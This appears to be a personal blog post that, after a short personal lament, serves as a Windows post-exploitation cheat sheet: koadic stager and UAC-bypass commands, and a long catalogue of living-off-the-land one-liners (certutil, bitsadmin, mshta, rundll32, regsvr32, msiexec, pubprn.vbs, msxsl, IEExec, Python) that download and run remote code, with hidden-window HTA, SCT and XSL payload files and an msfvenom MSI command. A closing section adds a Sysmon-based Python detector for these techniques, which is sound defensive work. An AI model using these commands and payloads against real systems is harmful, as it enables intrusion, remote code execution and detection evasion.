Sh4dow's Blog

In my twenty-odd years nobody has ever given me an unexpected moment of being moved or a surprise, nobody has given me a special present on my birthday, when I was ill all I got were a few words of comfort from people who were not there, and I never saw anyone really take care of me; sometimes I just pulled the covers over my head, slept it off and was fine. People have liked me, but I have never seen anyone stick with it.

Internal-network post-exploitation commands and tricks

koadic, the tool presented at DEF CON, covers basically every hard case of controlling Windows hosts on an internal network: the awkward js/vbs/regsvr32 cases, download and execute. PowerShell one-liners run into the command-line length limit; for PowerShell you can stage through msf web_delivery instead. Empire is also worth recommending; its PowerShell-based approach is solid.

koadic is the recommendation here.

koadic usage template (mshta stager)

stager/js/mshta 

mshta    https://

zombies

Under implant/ pick the module for the bypass:

use implant/elevate/bypassuac_eventvwr

set PAYLOAD 0

info

set PAYLOAD 0   (run it against a live zombie; koadic selects the target with the ZOMBIE option, e.g. set ZOMBIE 0)

Port scan: implant/scan/tcp

koadic usage template (regsvr32 stager)

stager/js/regsvr

Run on the target: regsvr32 /s /u /n /i:https://xxxxxxx scrobj.dll

-----

--------------

Summary of downloading files from the Windows command line

0x00 Powershell

Not available on Win2003 / WinXP (PowerShell is not installed there by default)


$client = New-Object System.Net.WebClient

$client.DownloadFile('https://payloads.online/file.tar.gz', 'E:\file.tar.gz')


0x01 ftp

ftp 192.168.3.2


After entering the username and password:


lcd E:\file # local side: change into E:\file

cd www # remote side: change into the server's www directory

get access.log # download the server's access.log into E:\file


Reference: https://baike.baidu.com/item/ftp/13839


0x02 IPC$

copy \\192.168.3.1\c$\test.exe E:\file   (admin share; needs an authenticated IPC$ session to the host first, e.g. via net use)


Reference: https://www.163164.com/jiqiao/163164com011.htm


0x03 Certutil

Reference: https://technet.microsoft.com/zh-cn/library/cc773087(WS.10).aspx

Applies to: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2


certutil.exe -urlcache -split -f https://192.168.3.1/test.txt file.txt


0x04 bitsadmin

Reference: https://msdn.microsoft.com/en-us/library/aa362813(v=vs.85).aspx

1. bitsadmin /rawreturn /transfer getfile https://192.168.3.1/test.txt E:\file\test.txt

2. bitsadmin /rawreturn /transfer getpayload https://192.168.3.1/test.txt E:\file\test.txt

The word after /transfer is just the job name. /rawreturn only trims the progress output; the download is still a BITS job, so it is visible with bitsadmin /list and in the BITS-Client operational event log.

0x05 msiexec

msiexec /q /i https://192.168.3.1/test.txt


0x06 IEExec

C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off


C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec https://192.168.3.1/test.exe


0x07 python

C:\python27\python.exe -c "import urllib2; exec urllib2.urlopen('https://192.168.3.1/test.zip').read();"


0x08 mshta

mshta https://192.168.3.1/run.hta


run.hta contents:

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script language="VBScript">
' shrink the window and move it off-screen so nothing visible appears
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c net user"   ' put the command to run here
self.close
</script>
</HEAD>
<body>
demo
</body>
</HTML>

0x09 rundll32

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","https://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

Under the hood this still depends on the WScript.Shell component. The %20 sequences are decoded by the javascript: handler, so they stand for spaces; the catch branch kills rundll32 if the fetch fails.


0x10 regsvr32

regsvr32 /u /s /i:https://192.168.3.1/test.data scrobj.dll


test.data contents:

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            // command to run; Run(cmd, 0, true) = hidden window, wait for exit
            ps = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps, 0, true);
        ]]>
    </script>
</registration>
</scriptlet>

An .sct can also be generated with https://github.com/CroweCybersecurity/ps1encode (COM scriptlet - requires a webserver to stage the payload).




------------------------------------

Other


5. pubprn.vbs

e.g.:

cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

The script lives in a locale-named folder (zh-CN here, en-US on an English install). Its second argument is passed to GetObject, so a script: moniker makes it fetch and run the remote .sct.


8. certutil

e.g.:

certutil -urlcache -split -f https://site.com/a a.exe && a.exe && del a.exe && certutil -urlcache -split -f https://site.com/a delete

The trailing "delete" removes the copy certutil keeps in its URL cache; it has to be given the same URL that was downloaded.

9. msiexec

msiexec /q /i https://site.com/payloads/calc.png

calc.png is an MSI package built with msfvenom (msiexec does not care about the extension):

msfvenom -f msi -p windows/exec CMD=calc.exe > calc.png

10. msxsl.exe (not shipped with Windows, has to be brought along)

e.g.:

msxsl https://evi1cg.me/scripts/demo.xml https://evi1cg.me/scripts/exec.xsl

demo.xml


<?xml version="1.0"?>

<?xml-stylesheet type="text/xsl" href="exec.xsl" ?>

<customers>

<customer>

<name>Microsoft</name>

</customer>

</customers>

exec.xsl (the xsl namespace URI has to be exactly http://www.w3.org/1999/XSL/Transform; it is an identifier, not a link, and with any other value msxsl will not treat the file as a stylesheet)

<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="https://mycompany.com/mynamespace">

<msxsl:script language="JScript" implements-prefix="user">
    function xml(nodelist) {
        // the transform is only the vehicle; the side effect is this command
        var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
        return nodelist.nextNode().xml;
    }
</msxsl:script>

<xsl:template match="/">
    <xsl:value-of select="user:xml(.)"/>
</xsl:template>
</xsl:stylesheet>

11. IEExec

e.g.:

C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off

C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec https://site.com/files/test64.exe

caspol -s off disables .NET code-access security so the remote assembly is allowed to run; IEExec only launches managed (.NET) executables.

Details: (link)


12. IEXPLORE.EXE

This needs IE to have a vulnerability that gives command execution.

e.g.:

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" https://site.com/exp

The exploit page can be something like ms14_064.
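Every technique above shows up in endpoint telemetry as an ordinary system binary started with a URL on its command line. The following is an added example, not code from this blog or from any of the tools it mentions: a small Python detector that flags the download-and-execute one-liners catalogued on this page in Sysmon-style process-creation events. It assumes only the Image and CommandLine fields of Sysmon Event ID 1; the rule names and the sample events are constructed for the example.

```python
"""Flag the LOLBin download/execute one-liners catalogued on this page in
Sysmon-style process-creation events (Image + CommandLine). Added example;
rules and sample events are constructed here, not the blog's material."""
import re
from dataclasses import dataclass

URL = r"https?://"


@dataclass(frozen=True)
class Rule:
    name: str
    images: frozenset  # process basenames (no ".exe") the rule applies to
    pattern: str       # regex tested case-insensitively against CommandLine


RULES = (
    Rule("certutil_urlcache_download", frozenset({"certutil"}), rf'-urlcache\b.*-f\s+"?{URL}'),
    Rule("bitsadmin_transfer_download", frozenset({"bitsadmin"}), rf"/transfer\b.*{URL}"),
    Rule("regsvr32_scrobj_remote_sct", frozenset({"regsvr32"}), rf'/i:"?{URL}.*scrobj\.dll'),
    Rule("mshta_remote_or_inline_script", frozenset({"mshta"}), rf"({URL}|\b(java|vb)script:)"),
    Rule("rundll32_javascript", frozenset({"rundll32"}), r"\bjavascript:"),
    Rule("msiexec_remote_install", frozenset({"msiexec"}), rf'/i\s+"?{URL}'),
    Rule("ieexec_remote_exe", frozenset({"ieexec"}), URL),
    Rule("pubprn_remote_script_moniker", frozenset({"cscript", "wscript"}), rf"pubprn\.vbs.*\bscript:{URL}"),
    Rule("msxsl_remote_stylesheet", frozenset({"msxsl"}), URL),
    Rule("powershell_webclient_download", frozenset({"powershell", "pwsh"}), r"Net\.WebClient|Download(File|String)\("),
    Rule("python_inline_urlopen", frozenset({"python", "python2", "python3"}), r"-c\s.*urlopen\("),
)


def image_basename(image: str) -> str:
    """Reduce a full Image path to its lower-case basename without .exe."""
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def match_rules(event: dict) -> list:
    """Names of every rule that fires on one event (empty list if none)."""
    image = image_basename(event["Image"])
    return [r.name for r in RULES
            if image in r.images and re.search(r.pattern, event["CommandLine"], re.IGNORECASE)]


def scan(events) -> dict:
    """Map event index -> fired rule names, only for events that fired."""
    hits = {}
    for i, event in enumerate(events):
        fired = match_rules(event)
        if fired:
            hits[i] = fired
    return hits


def ev(image, cmd):
    return {"Image": image, "CommandLine": cmd}


SAMPLE_EVENTS = [
    # constructed, modelled on the one-liners above: all of these should fire
    ev(r"C:\Windows\System32\certutil.exe", r"certutil.exe -urlcache -split -f https://192.168.3.1/test.txt file.txt"),
    ev(r"C:\Windows\System32\bitsadmin.exe", r"bitsadmin /rawreturn /transfer getfile https://192.168.3.1/test.txt E:\file\test.txt"),
    ev(r"C:\Windows\System32\regsvr32.exe", r"regsvr32 /u /s /i:https://192.168.3.1/test.data scrobj.dll"),
    ev(r"C:\Windows\System32\mshta.exe", r"mshta https://192.168.3.1/run.hta"),
    ev(r"C:\Windows\System32\rundll32.exe", r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();'),
    ev(r"C:\Windows\System32\msiexec.exe", r"msiexec /q /i https://192.168.3.1/test.txt"),
    ev(r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe", r"IEExec https://192.168.3.1/test.exe"),
    ev(r"C:\Windows\System32\cscript.exe", r"cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://192.168.3.1/test.sct"),
    ev(r"C:\tools\msxsl.exe", r"msxsl https://192.168.3.1/demo.xml https://192.168.3.1/exec.xsl"),
    ev(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"powershell -c $c=New-Object System.Net.WebClient;$c.DownloadFile('https://192.168.3.1/f.tar.gz','E:\f.tar.gz')"),
    ev(r"C:\python27\python.exe", "python.exe -c \"import urllib2; exec urllib2.urlopen('https://192.168.3.1/t').read();\""),
    # constructed benign administration: none of these should fire
    ev(r"C:\Windows\System32\certutil.exe", r"certutil -dump C:\certs\server.cer"),
    ev(r"C:\Windows\System32\regsvr32.exe", r"regsvr32 /s C:\Program Files\Vendor\component.dll"),
    ev(r"C:\Windows\System32\msiexec.exe", r"msiexec /i C:\Users\admin\Downloads\setup.msi /qn"),
    ev(r"C:\Windows\System32\bitsadmin.exe", r"bitsadmin /list /allusers"),
    ev(r"C:\Windows\System32\mshta.exe", r"mshta C:\tools\dashboard.hta"),
]

if __name__ == "__main__":
    for i, fired in scan(SAMPLE_EVENTS).items():
        print(f"[{i}] {SAMPLE_EVENTS[i]['CommandLine'][:60]}... -> {fired}")
```

Keying the rules on the image basename is deliberately simple and is defeated by copying or renaming the binary; in a real pipeline key them on Sysmon's OriginalFileName (taken from the PE version resource) and add parent-process context. The patterns also only cover the http(s) forms shown on this page, not UNC paths or files that were staged locally first.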



© Sh4dow's Blog | Powered by LOFTER